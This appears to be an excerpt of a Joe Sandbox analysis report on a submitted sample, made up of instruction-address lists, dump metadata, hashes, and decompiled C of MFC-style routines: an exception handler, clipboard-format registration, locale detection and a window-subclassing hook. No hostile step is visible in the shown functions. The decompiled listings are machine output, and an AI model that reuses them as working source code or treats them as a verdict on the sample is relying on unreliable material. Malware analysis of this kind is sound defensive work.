                                                                              0x004012b2
                                                                              0x004012b9
                                                                              0x004012bc
                                                                              0x004012bf
                                                                              0x004012d4
                                                                              0x004012db
                                                                              0x004012dd
                                                                              0x004012e0
                                                                              0x004012e4
                                                                              0x004012ec
                                                                              0x004012ee
                                                                              0x004012f1
                                                                              0x004012f5
                                                                              0x004012fc
                                                                              0x004012ff
                                                                              0x00401302
                                                                              0x00401314
                                                                              0x0040131e
                                                                              0x00401320
                                                                              0x00401323
                                                                              0x00401327
                                                                              0x0040132f
                                                                              0x00401331
                                                                              0x00401334
                                                                              0x00401338
                                                                              0x0040133f
                                                                              0x00401342
                                                                              0x00401345
                                                                              0x00401354
                                                                              0x00401357
                                                                              0x0040135a
                                                                              0x0040135d
                                                                              0x00401360
                                                                              0x00401363
                                                                              0x00401363
                                                                              0x00401363
                                                                              0x0040136c
                                                                              0x0040136c
                                                                              0x0040136f
                                                                              0x00401372
                                                                              0x00401375
                                                                              0x00401547
                                                                              0x0040154b
                                                                              0x0040154d
                                                                              0x00401550
                                                                              0x00401554
                                                                              0x0040155c
                                                                              0x0040155e
                                                                              0x00401561
                                                                              0x00401565
                                                                              0x0040156c
                                                                              0x0040156f
                                                                              0x00401572
                                                                              0x00401583
                                                                              0x00401583
                                                                              0x00401586
                                                                              0x00401588
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00401387
                                                                              0x00401389
                                                                              0x0040138c
                                                                              0x00401390
                                                                              0x00401398
                                                                              0x0040139a
                                                                              0x0040139d
                                                                              0x004013a1
                                                                              0x004013a8
                                                                              0x004013ab
                                                                              0x004013ae
                                                                              0x004013c0
                                                                              0x004013c0
                                                                              0x004013c3
                                                                              0x004013c6
                                                                              0x004013d3
                                                                              0x004013d5
                                                                              0x004013d8
                                                                              0x004013dc
                                                                              0x004013e4
                                                                              0x004013e6
                                                                              0x004013e9
                                                                              0x004013ed
                                                                              0x004013f4
                                                                              0x004013f7
                                                                              0x004013fa
                                                                              0x0040140c
                                                                              0x0040140c
                                                                              0x0040140f
                                                                              0x00401412
                                                                              0x0040141f
                                                                              0x00401421
                                                                              0x00401424
                                                                              0x00401428
                                                                              0x00401430
                                                                              0x00401432
                                                                              0x00401435
                                                                              0x00401439
                                                                              0x00401440
                                                                              0x00401443
                                                                              0x00401446
                                                                              0x00401458
                                                                              0x00401458
                                                                              0x0040145b
                                                                              0x0040145e
                                                                              0x0040146b
                                                                              0x0040146d
                                                                              0x00401470
                                                                              0x00401474
                                                                              0x0040147c
                                                                              0x0040147e
                                                                              0x00401481
                                                                              0x00401485
                                                                              0x0040148c
                                                                              0x0040148f
                                                                              0x00401492
                                                                              0x004014a4
                                                                              0x004014a4
                                                                              0x004014a7
                                                                              0x004014aa
                                                                              0x004014b7
                                                                              0x004014b9
                                                                              0x004014bc
                                                                              0x004014c0
                                                                              0x004014c8
                                                                              0x004014ca
                                                                              0x004014cd
                                                                              0x004014d1
                                                                              0x004014d8
                                                                              0x004014db
                                                                              0x004014de
                                                                              0x004014f0
                                                                              0x004014f0
                                                                              0x004014f3
                                                                              0x004014f6
                                                                              0x00401503
                                                                              0x00401505
                                                                              0x00401508
                                                                              0x0040150c
                                                                              0x00401514
                                                                              0x00401516
                                                                              0x00401519
                                                                              0x0040151d
                                                                              0x00401524
                                                                              0x00401527
                                                                              0x0040152a
                                                                              0x0040153c
                                                                              0x0040153c
                                                                              0x0040153f
                                                                              0x00401542
                                                                              0x00401544
                                                                              0x00000000
                                                                              0x00401544
                                                                              0x00401542
                                                                              0x004014f6
                                                                              0x004014aa
                                                                              0x0040145e
                                                                              0x00401412
                                                                              0x00000000
                                                                              0x004013c6
                                                                              0x0040158e
                                                                              0x0040158e
                                                                              0x00401591
                                                                              0x00401596
                                                                              0x00401598
                                                                              0x0040159d

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a545c46f738c6dd3eca3725ba76f5e89ac8a2b400202f6f8950e2b5353da3332
                                                                              • Instruction ID: 657004da2e98d02b39c88a2bd8f649863e229df5ea06ecd61c120a8d424944c4
                                                                              • Opcode Fuzzy Hash: a545c46f738c6dd3eca3725ba76f5e89ac8a2b400202f6f8950e2b5353da3332
                                                                              • Instruction Fuzzy Hash: E512DAB4E04B48EFCB14CF59C4C058DBBF1AF8C314F29C1A9C5989B756D239AA56CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00412BF0, Relevance: .1, Instructions: 77COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 71%
                                                                              			E00412BF0(signed int* __eax, void* __ebx, signed int __edx, char _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				signed int _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E004127F2(_t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00416F68(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E004127B0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E004127F2(_t66, 0);
										_t99 = _t99 + 0xc;
										E00412886(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                                              0x00412bf4
                                                                              0x00412bf5
                                                                              0x00412bf6
                                                                              0x00412bf9
                                                                              0x00412bfb
                                                                              0x00412bfe
                                                                              0x00412bff
                                                                              0x00412c01
                                                                              0x00412c02
                                                                              0x00412c03
                                                                              0x00412c06
                                                                              0x00412c10
                                                                              0x00412cc1
                                                                              0x00412cc8
                                                                              0x00412cd1
                                                                              0x00412c16
                                                                              0x00412c16
                                                                              0x00412c1c
                                                                              0x00412c22
                                                                              0x00412c25
                                                                              0x00412c28
                                                                              0x00412c2c
                                                                              0x00412c31
                                                                              0x00412c36
                                                                              0x00412cb6
                                                                              0x00000000
                                                                              0x00412c38
                                                                              0x00412c38
                                                                              0x00412c44
                                                                              0x00412c46
                                                                              0x00412ca1
                                                                              0x00412ca1
                                                                              0x00412ca7
                                                                              0x00000000
                                                                              0x00412c48
                                                                              0x00412c57
                                                                              0x00412c59
                                                                              0x00412c5a
                                                                              0x00412c5b
                                                                              0x00412c5e
                                                                              0x00412c5e
                                                                              0x00412c60
                                                                              0x00000000
                                                                              0x00412c62
                                                                              0x00412c62
                                                                              0x00412cac
                                                                              0x00412c64
                                                                              0x00412c64
                                                                              0x00412c68
                                                                              0x00412c70
                                                                              0x00412c75
                                                                              0x00412c7a
                                                                              0x00412c86
                                                                              0x00412c8e
                                                                              0x00412c95
                                                                              0x00412c9b
                                                                              0x00412c9f
                                                                              0x00000000
                                                                              0x00412c9f
                                                                              0x00412c62
                                                                              0x00412c60
                                                                              0x00000000
                                                                              0x00412c46
                                                                              0x00412cba
                                                                              0x00412cba
                                                                              0x00412cba
                                                                              0x00412c36
                                                                              0x00412cd6
                                                                              0x00412cdd

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5c99ed829b259f7ab4d6fdcf62688ea615c09a04812f857c2e126621e6c53be3
                                                                              • Instruction ID: d68645e02943f572eecde95166dd713f0f07b62c4c24d8ecf8765f780d3b4ed0
                                                                              • Opcode Fuzzy Hash: 5c99ed829b259f7ab4d6fdcf62688ea615c09a04812f857c2e126621e6c53be3
                                                                              • Instruction Fuzzy Hash: DA21F872900204AFCB10EF69C9C08EBBBA5FF44350B068169ED19CB245E774F965C7E4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042E657, Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registrywindowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042E657(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterWindowMessageA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterWindowMessageA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterWindowMessageA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterWindowMessageA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterWindowMessageA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterWindowMessageA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterWindowMessageA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterWindowMessageA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterWindowMessageA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterWindowMessageA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterWindowMessageA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterWindowMessageA("RichEdit Text and Objects");
				return _t27;
			}




                                                                              0x0042e664
                                                                              0x0042e66d
                                                                              0x0042e676
                                                                              0x0042e680
                                                                              0x0042e68a
                                                                              0x0042e694
                                                                              0x0042e69e
                                                                              0x0042e6a8
                                                                              0x0042e6b2
                                                                              0x0042e6bc
                                                                              0x0042e6c6
                                                                              0x0042e6d0
                                                                              0x0042e6d5
                                                                              0x0042e6dc

                                                                              APIs
                                                                              • RegisterWindowMessageA.USER32(Native), ref: 0042E666
                                                                              • RegisterWindowMessageA.USER32(OwnerLink), ref: 0042E66F
                                                                              • RegisterWindowMessageA.USER32(ObjectLink), ref: 0042E679
                                                                              • RegisterWindowMessageA.USER32(Embedded Object), ref: 0042E683
                                                                              • RegisterWindowMessageA.USER32(Embed Source), ref: 0042E68D
                                                                              • RegisterWindowMessageA.USER32(Link Source), ref: 0042E697
                                                                              • RegisterWindowMessageA.USER32(Object Descriptor), ref: 0042E6A1
                                                                              • RegisterWindowMessageA.USER32(Link Source Descriptor), ref: 0042E6AB
                                                                              • RegisterWindowMessageA.USER32(FileName), ref: 0042E6B5
                                                                              • RegisterWindowMessageA.USER32(FileNameW), ref: 0042E6BF
                                                                              • RegisterWindowMessageA.USER32(Rich Text Format), ref: 0042E6C9
                                                                              • RegisterWindowMessageA.USER32(RichEdit Text and Objects), ref: 0042E6D3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: MessageRegisterWindow
                                                                              • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                              • API String ID: 1814269913-2889995556
                                                                              • Opcode ID: f94b3afc578d778d6bf50c54cce4d5399f28073c0875a693aa6b0923429169c7
                                                                              • Instruction ID: 3148e3fe882cb6921084bbb575d8ac1fe485f6c47ad919569a1cc5a96f9e35c4
                                                                              • Opcode Fuzzy Hash: f94b3afc578d778d6bf50c54cce4d5399f28073c0875a693aa6b0923429169c7
                                                                              • Instruction Fuzzy Hash: 98014C70A407485AEB30AF769C09D0BBAE4EED5B103624D2FD09597652D7BCD004CFD8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042C343, Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 167registrylibraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
                                                                              			E0042C343(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				void* _v28;
				void* _v32;
				int _v36;
				int _v40;
				signed short _v44;
				int _v52;
				int _v56;
				int _v60;
				int _v64;
				intOrPtr _t42;
				struct HINSTANCE__* _t43;
				_Unknown_base(*)()* _t44;
				struct HINSTANCE__* _t46;
				signed int _t50;
				signed short _t65;
				signed int _t66;
				int _t70;
				signed short _t71;
				signed int _t72;
				signed short _t78;
				signed int _t79;
				char* _t85;
				int _t87;
				signed int _t98;
				signed int _t103;
				int _t104;
				int _t105;
				void* _t109;
				void* _t113;

				_t42 =  *0x457184; // 0xb7aa1229
				_t85 = 0;
				_v8 = _t42;
				_v28 = 0;
				_t43 = GetModuleHandleA("kernel32.dll");
				_v36 = _t43;
				_t44 = GetProcAddress(_t43, "GetUserDefaultUILanguage");
				if(_t44 == 0) {
					if(GetVersion() >= 0) {
						_t46 = GetModuleHandleA("ntdll.dll");
						if(_t46 == 0) {
							L13:
							 *((intOrPtr*)(_t113 + 0xffffffffffffffc4)) = 0x800;
							_t109 = 1;
							_t103 = 0;
							if(1 <= _t85) {
								L16:
								L17:
								return E00412FBB(0, _v8);
							}
							while(E0042C2AE(_t109, _a4,  *((intOrPtr*)(_t113 + _t103 * 4 - 0x3c))) == _t85) {
								_t103 =  &(1[_t103]);
								if(_t103 < _t109) {
									continue;
								}
								goto L16;
							}
							goto L17;
						}
						_v28 = 0;
						EnumResourceLanguagesA(_t46, 0x10, 1, E0042C32D,  &_v28);
						if(_v28 == 0) {
							goto L13;
						}
						_t50 = _v28 & 0x0000ffff;
						_t104 = _t50 & 0x3ff;
						_v64 = ConvertDefaultLocale(_t50 & 0x0000fc00 | _t104);
						_v60 = ConvertDefaultLocale(_t104);
						_push(2);
						L12:
						_pop(0);
						goto L13;
					}
					_v32 = 0;
					if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v32) == 0) {
						_v36 = 0x10;
						if(RegQueryValueExA(_v32, 0, 0,  &_v40,  &_v24,  &_v36) == 0 && _v40 == 1 && E00412FC9( &_v24, "%x",  &_v44) == 1) {
							_t65 = _v44;
							_v28 = _t65;
							_t66 = _t65 & 0x0000ffff;
							_t105 = _t66 & 0x3ff;
							_v64 = ConvertDefaultLocale(_t66 & 0x0000fc00 | _t105);
							_t70 = ConvertDefaultLocale(_t105);
							_push(2);
							_v60 = _t70;
							_pop(0);
						}
						RegCloseKey(_v32);
					}
					goto L13;
				}
				_t71 =  *_t44();
				_v28 = _t71;
				_t72 = _t71 & 0x0000ffff;
				_t98 = _t72 & 0x3ff;
				_v32 = _t98;
				_v64 = ConvertDefaultLocale(_t72 & 0x0000fc00 | _t98);
				_v60 = ConvertDefaultLocale(_v32);
				_t78 =  *(GetProcAddress(_v36, "GetSystemDefaultUILanguage"))();
				_v28 = _t78;
				_t79 = _t78 & 0x0000ffff;
				_t87 = _t79 & 0x3ff;
				_v56 = ConvertDefaultLocale(_t79 & 0x0000fc00 | _t87);
				_v52 = ConvertDefaultLocale(_t87);
				_push(4);
				_t85 = 0;
				goto L12;
			}


































                                                                              0x0042c349
                                                                              0x0042c357
                                                                              0x0042c35e
                                                                              0x0042c361
                                                                              0x0042c366
                                                                              0x0042c36e
                                                                              0x0042c371
                                                                              0x0042c379
                                                                              0x0042c3ed
                                                                              0x0042c49a
                                                                              0x0042c49e
                                                                              0x0042c4e8
                                                                              0x0042c4e8
                                                                              0x0042c4f0
                                                                              0x0042c4f1
                                                                              0x0042c4f5
                                                                              0x0042c50e
                                                                              0x0042c510
                                                                              0x0042c51c
                                                                              0x0042c51c
                                                                              0x0042c4f7
                                                                              0x0042c509
                                                                              0x0042c50c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042c50c
                                                                              0x00000000
                                                                              0x0042c4f7
                                                                              0x0042c4ae
                                                                              0x0042c4b1
                                                                              0x0042c4bb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042c4bd
                                                                              0x0042c4cf
                                                                              0x0042c4dd
                                                                              0x0042c4e2
                                                                              0x0042c4e5
                                                                              0x0042c4e7
                                                                              0x0042c4e7
                                                                              0x00000000
                                                                              0x0042c4e7
                                                                              0x0042c407
                                                                              0x0042c412
                                                                              0x0042c429
                                                                              0x0042c438
                                                                              0x0042c45a
                                                                              0x0042c463
                                                                              0x0042c466
                                                                              0x0042c471
                                                                              0x0042c47f
                                                                              0x0042c482
                                                                              0x0042c484
                                                                              0x0042c486
                                                                              0x0042c489
                                                                              0x0042c489
                                                                              0x0042c48d
                                                                              0x0042c48d
                                                                              0x00000000
                                                                              0x0042c412
                                                                              0x0042c37b
                                                                              0x0042c38d
                                                                              0x0042c390
                                                                              0x0042c397
                                                                              0x0042c39f
                                                                              0x0042c3a7
                                                                              0x0042c3b4
                                                                              0x0042c3bd
                                                                              0x0042c3bf
                                                                              0x0042c3c2
                                                                              0x0042c3c9
                                                                              0x0042c3d4
                                                                              0x0042c3d9
                                                                              0x0042c3dc
                                                                              0x0042c3de
                                                                              0x00000000

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0042C366
                                                                              • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0042C371
                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 0042C3A2
                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 0042C3AA
                                                                              • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0042C3B7
                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 0042C3D1
                                                                              • ConvertDefaultLocale.KERNEL32(000003FF), ref: 0042C3D7
                                                                              • GetVersion.KERNEL32 ref: 0042C3E5
                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 0042C40A
                                                                              • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 0042C430
                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 0042C47C
                                                                              • ConvertDefaultLocale.KERNEL32(74B04DE0), ref: 0042C482
                                                                              • RegCloseKey.ADVAPI32(?), ref: 0042C48D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
                                                                              • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                              • API String ID: 780041395-483790700
                                                                              • Opcode ID: e7ab873c4a7da65feff9fc701e108c43e95153f360078c6021a868a4be157191
                                                                              • Instruction ID: ccf25d3531818ff2d7a54f46dd2cf71900e61049d2b2bcb3935074943bb9269f
                                                                              • Opcode Fuzzy Hash: e7ab873c4a7da65feff9fc701e108c43e95153f360078c6021a868a4be157191
                                                                              • Instruction Fuzzy Hash: D4517871E40229AFDF109FE5DD86ABFBAB8EB48314F50443BE501E3150D6BC9941DB64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004274DA, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 167stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 98%
                                                                              			E004274DA(void* __ebx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
				intOrPtr _v8;
				char _v16;
				char _v17;
				char _v272;
				struct _WNDCLASSEXA _v320;
				void* __ebp;
				intOrPtr _t52;
				signed int _t56;
				char _t58;
				long _t60;
				int _t71;
				long _t81;
				CHAR* _t83;
				void* _t90;
				void* _t99;
				long* _t102;
				signed int _t104;
				long _t105;
				CHAR* _t107;
				int _t108;

				_t52 =  *0x457184; // 0xb7aa1229
				_push(E0042CC8D);
				_v8 = _t52;
				_t90 = E0042E088(0x458600);
				if(_a4 == 3) {
					_t104 =  *(_t90 + 0x14);
					_t99 =  *_a12;
					_t56 =  *(E0042D179() + 0x14) & 0x000000ff;
					_a4 = _t56;
					if(_t104 != 0 || ( *(_t99 + 0x23) & 0x00000040) == 0 && _t56 == 0) {
						if( *0x45a368 == 0) {
							L10:
							if(_t104 == 0) {
								if( *0x459f80 != 0) {
									L16:
									if(GetClassLongA(_a8, 0xffffffe0) !=  *0x459f80) {
										L20:
										_t58 = GetWindowLongA(_a8, 0xfffffffc);
										_v16 = _t58;
										if(_t58 != 0) {
											_t107 = "AfxOldWndProc423";
											if(GetPropA(_a8, _t107) == 0) {
												SetPropA(_a8, _t107, _v16);
												if(GetPropA(_a8, _t107) == _v16) {
													GlobalAddAtomA(_t107);
													SetWindowLongA(_a8, 0xfffffffc, E00427382);
												}
											}
										}
										goto L24;
									}
									goto L24;
								}
								_t108 = 0x30;
								E00412140( &_v320, 0, _t108);
								_v320.cbSize = _t108;
								_t71 = GetClassInfoExA(0, "#32768",  &_v320);
								 *0x459f80 = _t71;
								if(_t71 == 0) {
									if(GetClassNameA(_a8,  &_v272, 0x100) == 0) {
										goto L20;
									}
									_v17 = 0;
									if(E004132A8( &_v272, "#32768") == 0) {
										goto L24;
									}
									goto L20;
								}
								goto L16;
							}
							E00426447(_t104, _a8);
							 *((intOrPtr*)( *_t104 + 0x50))();
							_t102 =  *((intOrPtr*)( *_t104 + 0xf0))();
							_t81 = SetWindowLongA(_a8, 0xfffffffc, E00426AB8);
							if(_t81 != E00426AB8) {
								 *_t102 = _t81;
							}
							 *(_t90 + 0x14) =  *(_t90 + 0x14) & 0x00000000;
							goto L24;
						}
						if((GetClassLongA(_a8, 0xffffffe6) & 0x00010000) != 0) {
							goto L24;
						}
						_t83 =  *(_t99 + 0x28);
						if(_t83 <= 0xffff) {
							_v16 = 0;
							GlobalGetAtomNameA(0,  &_v16, 5);
							_t83 =  &_v16;
						}
						if(lstrcmpiA(_t83, "ime") == 0) {
							goto L24;
						}
						goto L10;
					} else {
						L24:
						_t105 = CallNextHookEx( *(_t90 + 0x28), 3, _a8, _a12);
						if(_a4 != 0) {
							UnhookWindowsHookEx( *(_t90 + 0x28));
							 *(_t90 + 0x28) =  *(_t90 + 0x28) & 0x00000000;
						}
						_t60 = _t105;
						goto L27;
					}
				} else {
					_t60 = CallNextHookEx( *(_t90 + 0x28), _a4, _a8, _a12);
					L27:
					return E00412FBB(_t60, _v8);
				}
			}























                                                                              0x004274e3
                                                                              0x004274e9
                                                                              0x004274f3
                                                                              0x004274ff
                                                                              0x00427501
                                                                              0x0042751e
                                                                              0x00427522
                                                                              0x0042752b
                                                                              0x0042752f
                                                                              0x00427532
                                                                              0x0042754d
                                                                              0x0042759d
                                                                              0x0042759f
                                                                              0x004275e6
                                                                              0x00427623
                                                                              0x00427635
                                                                              0x0042766c
                                                                              0x00427671
                                                                              0x00427679
                                                                              0x0042767c
                                                                              0x00427684
                                                                              0x00427691
                                                                              0x0042769a
                                                                              0x004276a9
                                                                              0x004276ac
                                                                              0x004276bc
                                                                              0x004276bc
                                                                              0x004276a9
                                                                              0x00427691
                                                                              0x00000000
                                                                              0x0042767c
                                                                              0x00000000
                                                                              0x00427637
                                                                              0x004275ea
                                                                              0x004275f5
                                                                              0x00427603
                                                                              0x00427612
                                                                              0x0042761b
                                                                              0x00427621
                                                                              0x00427653
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042765d
                                                                              0x0042766a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042766a
                                                                              0x00000000
                                                                              0x00427621
                                                                              0x004275a6
                                                                              0x004275af
                                                                              0x004275c7
                                                                              0x004275c9
                                                                              0x004275d1
                                                                              0x004275d3
                                                                              0x004275d3
                                                                              0x004275d5
                                                                              0x00000000
                                                                              0x004275d5
                                                                              0x0042755f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427565
                                                                              0x0042756d
                                                                              0x0042757b
                                                                              0x00427580
                                                                              0x00427586
                                                                              0x00427586
                                                                              0x00427597
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004276c2
                                                                              0x004276c2
                                                                              0x004276d7
                                                                              0x004276d9
                                                                              0x004276de
                                                                              0x004276e4
                                                                              0x004276e4
                                                                              0x004276e9
                                                                              0x00000000
                                                                              0x004276eb
                                                                              0x00427503
                                                                              0x0042750f
                                                                              0x004276ec
                                                                              0x004276f6
                                                                              0x004276f6

                                                                              APIs
                                                                                • Part of subcall function 0042E088: __EH_prolog.LIBCMT ref: 0042E08D
                                                                              • CallNextHookEx.USER32(?,00000003,?,?), ref: 0042750F
                                                                              • GetClassLongA.USER32 ref: 00427554
                                                                              • GlobalGetAtomNameA.KERNEL32 ref: 00427580
                                                                              • lstrcmpiA.KERNEL32(?,ime,?,?,Function_0002CC8D), ref: 0042758F
                                                                              • SetWindowLongA.USER32 ref: 004275C9
                                                                              • CallNextHookEx.USER32(?,00000003,?,?), ref: 004276CD
                                                                              • UnhookWindowsHookEx.USER32(?), ref: 004276DE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
                                                                              • String ID: #32768$AfxOldWndProc423$ime
                                                                              • API String ID: 3204395069-4034971020
                                                                              • Opcode ID: f1106e329e0d48cfa7b4281d793f4c3b4a21ab62a295908a11e446d5d3b41d10
